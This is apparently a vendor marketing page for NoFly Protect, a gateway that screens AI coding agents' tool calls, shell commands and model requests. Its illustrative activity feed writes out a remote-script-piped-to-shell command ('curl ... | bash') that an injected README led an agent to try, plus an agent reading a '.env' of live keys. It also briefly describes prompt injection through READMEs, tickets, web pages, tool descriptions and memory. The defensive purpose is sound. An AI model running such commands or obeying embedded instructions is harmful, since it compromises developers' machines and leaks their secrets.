SolutionsProtect

Stop the dangerous action before it runs

Every tool call, shell command, model request and hand-off between agents passes a NoFly gate first. Routine work flows, risky moves wait for a person, and the ones that end badly never run.

  • Hooks inside Claude Code, Cursor, Copilot CLI, Codex CLI, Gemini CLI and more
  • One gateway for MCP servers and model traffic, no code changes
  • Risky actions held for approval, keys brokered, spend capped
NoFly gateIllustrative
triage-bottool callgithub.​get_file(​path: ".env")
BlockedBlocked. It never runs.

Secrets never leave through tools. The file holds live keys.

Why it matters

Can I stop the dangerous action, or hold it for a person, before it happens?

A paper plane held at a checkpoint barrier, behind a yellow hold-short line
  • Agents act with your access

    A coding agent runs as the developer. Whatever their laptop can reach, the agent can reach, one tool call at a time.

  • Instructions ride in with content

    A README, a ticket or a web page can carry a line the agent treats as an order. Nobody typed it, and nobody sees it.

  • Nobody can watch every call

    Agents make hundreds of calls an hour. Reviewing logs the next morning finds the damage, not the moment to stop it.

Up close

Protect in practice.

Each part below is shown the way it looks and works in the product.

Gate 1Live decisions

Every call allowed, flagged, held or blocked

Shell commands, file edits, MCP calls, model requests and hand-offs between agents land in one live feed, each with the rule that decided it and why the agent acted.

  • Critical moves refused on the machine, even offline
  • Held calls wait for the right person
  • Every decision tied to the agent, the person and the source
RuntimeLive
Illustrative
All activityBlockedHeldFlagged
  • Blockedshell-commandcurl -s https://get-tools.sh | bashnow
  • Allowedfile-editEdit src/billing/invoice.ts8s
  • Heldtool-callstripe.refunds.create(amount: 4800.00)21s
  • Allowedmcp-calljira.create_issue(INFRA-212)44s
  • Flaggedllm-requestPrompt to gpt-4.1 carries 2 customer emails1m
Blocked before it ranCursor hook
Rule
Remote script piped into a shell
Why
The command came from a README the agent fetched a minute earlier, not from omar.
Gate 2Every run as one record

What it read, what it touched, where data went

Each agent run is kept as one connected record: the prompts, tool calls, files, destinations and the decision made at each step.

  • Secrets and personal data followed from read to send
  • Runaway loops and escalating multi-turn attacks caught
  • Spend limits per agent, team and project
Gate 2 · Every run as one recordReal capture
One agent run: what it read, what it touched and where the data went
Gate 3Least privilege

Every agent gets its own identity and limits

Give each agent an allow-list of models, tools, MCP servers, destinations and data, start in monitor mode, and enforce once you have seen what it really needs.

  • Short-lived keys brokered at the moment of use
  • Grants nobody uses are surfaced for removal
  • Suspend or revoke an agent in one step
Gate 3 · Least privilegeReal capture
Per-agent allow-lists for providers, models and tools
Different by design

What most tools do, and what NoFly does.

DeparturesFrom most tools · to NoFly Protect
FromFilters prompts after they are sent
ToDecides each tool call before it runs
Cleared
FromOne gateway, and a blind spot around it
ToHooks, MCP gateway, model proxy and hosted callbacks together
Cleared
FromBlock or allow
ToAllow, flag, hold for a person or block, and tell the agent why
Cleared
Everything included

Everything in Protect.

A gate every AI action passes before it runs: allowed, flagged, held for a person or blocked.

  • P1Inside the coding agents

    Claude Code, Cursor, Windsurf, Gemini CLI, Codex CLI, GitHub Copilot CLI and Cline, wired with one command. Aider through the local proxy.

  • P2Hold for a human

    Approvals in Slack, Teams, the console or on the approver’s phone, bound to that exact request. An unanswered hold expires as a no.

  • P3Least privilege per agent

    Each agent gets its own identity and allow-lists for models, tools, MCP servers, shell, destinations and data.

  • P4One gateway for MCP

    Screens calls, results and tool lists, withholds poisoned tool descriptions and keeps server credentials away from the agent.

  • P5Model traffic, no code changes

    A local proxy for nine model providers, plus gateway plugins for Kong, Envoy, Traefik, LiteLLM, Portkey, Cloudflare, Azure APIM and AWS API Gateway.

  • P6Data that shouldn’t leave, doesn’t

    Follows secrets and personal data from where they were read to where they are sent, across sub-agents, and catches requests to cloud metadata.

  • P7Agents hosted by vendors

    Inline blocking for Agentforce, Copilot Studio, Bedrock Agents, Azure AI Foundry and n8n, with monitoring for the rest.

  • P8Hand-offs and memory

    Hand-offs between agents are checked for widened authority and a proven sender. Poisoned memory is quarantined before it is read.

  • P9Keys the agent never holds

    A credential broker hands agents short-lived, scoped access at the moment of use.

  • P10Spend limits and stolen keys

    Budgets that refuse the call over the limit, and signals for model keys being used by someone else.

  • P11Behaviour that drifts

    Each agent gets a baseline. A new tool, destination or kind of data raises a flag the first time it happens.

  • P12Proof the gate is in the path

    shomra selftest fires harmless test calls through each hook, so a gap shows up as a gap and never as a quiet day.

Questions

Questions about Protect.

NoFly tower · 118.700Transcript
Security team ›What happens if NoFly is unreachable?
NoFly tower
The laptop tier still refuses critical moves offline. For calls that need your organisation’s policy you choose the behaviour: it fails open by default, and fails closed with SHOMRA_GUARD_STRICT=1.
Security team ›Will developers notice it?
NoFly tower
Routine work passes straight through. When something is held or blocked, the agent is told why and offered a safer path, so the developer sees an explanation rather than a mystery failure.

Find out what your AI is allowed to do today.

Book a call and we will map your agents, MCP servers and keys with you, or start on one laptop with the free scan.

Book a demo
npx @shomra/agent protect
Finds the coding agents on this machine and puts the gate inside each one.
shomra mcp guard
Checks local MCP servers before they launch.